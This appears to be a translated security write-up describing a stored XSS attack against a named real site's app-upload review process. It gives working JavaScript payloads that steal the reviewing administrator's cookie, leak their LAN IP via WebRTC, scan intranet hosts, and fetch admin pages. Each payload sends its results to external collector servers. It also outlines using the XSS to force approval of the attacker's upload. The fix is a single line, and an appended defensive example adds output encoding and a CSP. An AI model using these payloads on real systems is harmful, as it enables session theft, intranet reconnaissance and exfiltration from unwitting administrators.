Testing the 178 intranet through a stored XSS

Source: Internet
Author: User

Testing the 178 intranet through a stored XSS in an attachment payload

Site: http://apt.178.com/

The input is not filtered when an app or ringtone resource is added.


After upload, the resource is shown on the front-end only after an administrator has reviewed it.

So the XSS has to be fired blind, against whoever reviews it.

To my excitement, the cookie and other information came back successfully.

However, access to the admin back-end is restricted.

Okay, so that route does not lead very far.

So I wanted to use the XSS for something else.

First, obtain the intranet IP address.

I borrowed the payload from 0x_jin (a real expert), modified it locally and put it on a rather crude XSS platform. The payload the XSS platform can use is:

```javascript
// WebRTC local-address disclosure: the browser gathers ICE candidates for a
// dummy peer connection, and the "host" candidates in the SDP carry the
// machine's LAN address, which sendip() reports back to the XSS platform.
var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
if (RTCPeerConnection) (function() {
    var rtc = new RTCPeerConnection({ iceServers: [] });
    if (window.mozRTCPeerConnection) {
        // Firefox only gathers candidates once a channel exists
        rtc.createDataChannel('', { reliable: false });
    }
    rtc.onicecandidate = function(evt) {
        if (evt.candidate) grepSDP(evt.candidate.candidate);
    };
    rtc.createOffer(function(offerDesc) {
        grepSDP(offerDesc.sdp);
        rtc.setLocalDescription(offerDesc);
    }, function(e) {
        console.warn("offer failed", e);
    });
    var addrs = Object.create(null);
    addrs["0.0.0.0"] = false;   // never report the wildcard address
    function updateDisplay(newAddr) {
        if (newAddr in addrs) return;
        else addrs[newAddr] = true;
        var displayAddrs = Object.keys(addrs).filter(function(k) {
            return addrs[k];
        });
        var address = displayAddrs.join(" or perhaps ") || "n/a";
        sendip(address);
    }
    function grepSDP(sdp) {
        sdp.split('\r\n').forEach(function(line) {
            if (~line.indexOf("a=candidate")) {
                // a=candidate:<foundation> <component> <proto> <priority> <ip> <port> typ <type>
                var parts = line.split(' '),
                    addr = parts[4],
                    type = parts[7];
                if (type === 'host') updateDisplay(addr);
            } else if (~line.indexOf("c=")) {
                // c=IN IP4 <ip>
                var parts = line.split(' '),
                    addr = parts[2];
                updateDisplay(addr);
            }
        });
    }
})();
function sendip(ipaddress) {
    alert(ipaddress);
    // the collected address is sent to the XSS platform's API with a GET request
    var url = "http://*****.com/index.php?do=api&id={projectId}&address=" + ipaddress;
    var xmlhttp1 = new XMLHttpRequest();
    xmlhttp1.open("GET", url, true);
    xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp1.send(null);
}
```

The intranet IP address was then obtained successfully:


Current ip Address: 192.168.1.111

Next I wanted to find live hosts in that intranet segment. Tested locally: probing the whole range 1 to 255 hangs the browser, so only 110 to 130 is probed.

Payload:

```javascript
// Reports a host:port that answered back to the collector on SAE
function ipsend(ip, netport) {
    var ipdata = ip + ":" + netport;
    var url = "http://*****.sinaapp.com/insert.php?ip=" + ipdata;
    var xmlhttp1 = new XMLHttpRequest();
    xmlhttp1.open("GET", url, true);
    xmlhttp1.send(null);
}
// Walks the last octet of the given /24 and probes ports 80 and 8080 on each host
function ipCreate(ip) {
    var ips = ip.replace(/(\d+\.\d+\.\d+)\.\d+/, '$1.');
    for (var i = 100; i <= 130; i++) {   // text says 110 to 130; the loop as written starts at 100
        ElementCreate(ips + i, "80", i);
        ElementCreate(ips + i, "8080", i);
    }
}
// Inserts a <script src="http://ip:port"> tag; the load event fires only when
// something answered on that port, so onload means the host is alive
function ElementCreate(ip, xport, i) {
    var url = "http://" + ip + ":" + xport;
    var scriptElement = document.createElement("script");
    scriptElement.src = url;
    scriptElement.setAttribute("onload", "ipsend('" + ip + "', '" + xport + "')");
    document.body.appendChild(scriptElement);
}
ipCreate("192.168.1.100");
```

I sent the obtained intranet IP addresses and ports to my Sina Cloud SAE collector.

Afterwards, there appears to be no development infrastructure in this intranet; it seems to be used only for back-end review.

Since the intranet was not easy to go further with, and in answer to the call from Big Cloud (http://zone.wooyun.org/content/18421):

So I considered another method. Use the XSS to fetch the source of the review page and extract the approval request link from it; then, with the XSS riding the administrator's session (CSRF via XSS), the browser issues that request automatically when the administrator opens the review page, so the app I submitted is approved without review and reaches the front-end, widening the impact.

Start

Obtain the source code of http://apt.178.com/console/deb

Payload:

```javascript
Connection("console/deb");

// Fetches a same-origin page with the administrator's session and ships the
// response status and body to the collector
function Connection(url) {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function() {
        // every state change first reports the current status code ...
        DataSend('a', 'filename getresponse code is : ' + encodeURIComponent(xmlhttp.status));
        // ... and the body is sent once the response has fully arrived
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            DataSend(encodeURIComponent(url), encodeURIComponent(xmlhttp.responseText));
        }
    };
    xmlhttp.open("GET", url, true);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.send();
}

function DataSend(fileurl, FileData) {
    // FileData is placed both in the query string (so the URL can become very
    // long for a full page body) and in the POST body
    var url = "http://*****.sinaapp.com/insert.php?ip=" + FileData;
    var xmlhttp1 = new XMLHttpRequest();
    xmlhttp1.open("POST", url, true);
    xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp1.send("ip=" + FileData);
}
```

The fetched data is automatically sent to my server, http://*****.sinaapp.com/insert.php, for storage.

The JS sends two requests: the HTTP status code is stored first, then the content.

200: request successful.

But strangely, although the status code arrived, the content did not. This puzzled me; it was not in the server database either.

After a long delay, I then checked the server log for the page source.

Solution:

Filter the input.
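As an added defender-side example (not the 178 site's code and not from the original report), two controls that break the chain above: contextual HTML encoding of the attacker-supplied resource name when the review page renders it, and a Content-Security-Policy whose script-src and connect-src stop both the injected script and its XMLHttpRequest to an external collector. The function names, the review-row markup and the policy evaluator's scope are assumptions.

```javascript
// Added defensive example; not the 178 site's code. Names, the review-row
// markup and the simplified policy evaluator are assumptions.

// 1. Output encoding for the HTML text context. The resource name is attacker
//    controlled at upload time and is later rendered on the admin review page.
function escapeHtml(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// One row of the (hypothetical) review table, with every user-supplied field encoded.
function renderReviewRow(resource) {
  return '<tr><td>' + escapeHtml(resource.name) + '</td>' +
         '<td>' + escapeHtml(resource.type) + '</td></tr>';
}

// 2. A CSP for the review page. script-src 'self' stops injected inline script and
//    inline event handlers; connect-src 'self' stops the XMLHttpRequest that ships
//    cookies, the LAN address or page source to an external collector. Violations
//    are reported so the SOC can see attempted exfiltration.
var REVIEW_PAGE_CSP = [
  "default-src 'self'",
  "script-src 'self'",
  "connect-src 'self'",
  "object-src 'none'",
  "base-uri 'self'",
  "report-uri /csp-report"
].join('; ');

// Minimal evaluator (assumption: only 'self', '*' and plain host sources are
// modelled) answering whether an XHR/fetch from a page at pageOrigin to url is
// allowed by the policy's connect-src, falling back to default-src.
function connectAllowed(policy, pageOrigin, url) {
  var directives = {};
  policy.split(';').forEach(function (d) {
    var parts = d.trim().split(/\s+/);
    directives[parts[0]] = parts.slice(1);
  });
  var sources = directives['connect-src'] || directives['default-src'] || ['*'];
  var target = new URL(url);
  return sources.some(function (s) {
    if (s === '*') return true;
    if (s === "'self'") return target.origin === pageOrigin;
    return target.host === s;
  });
}
```

The policy is illustrative; a real deployment would also move the site's own inline scripts into files (or use nonces) before turning it on in enforcing mode.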

 
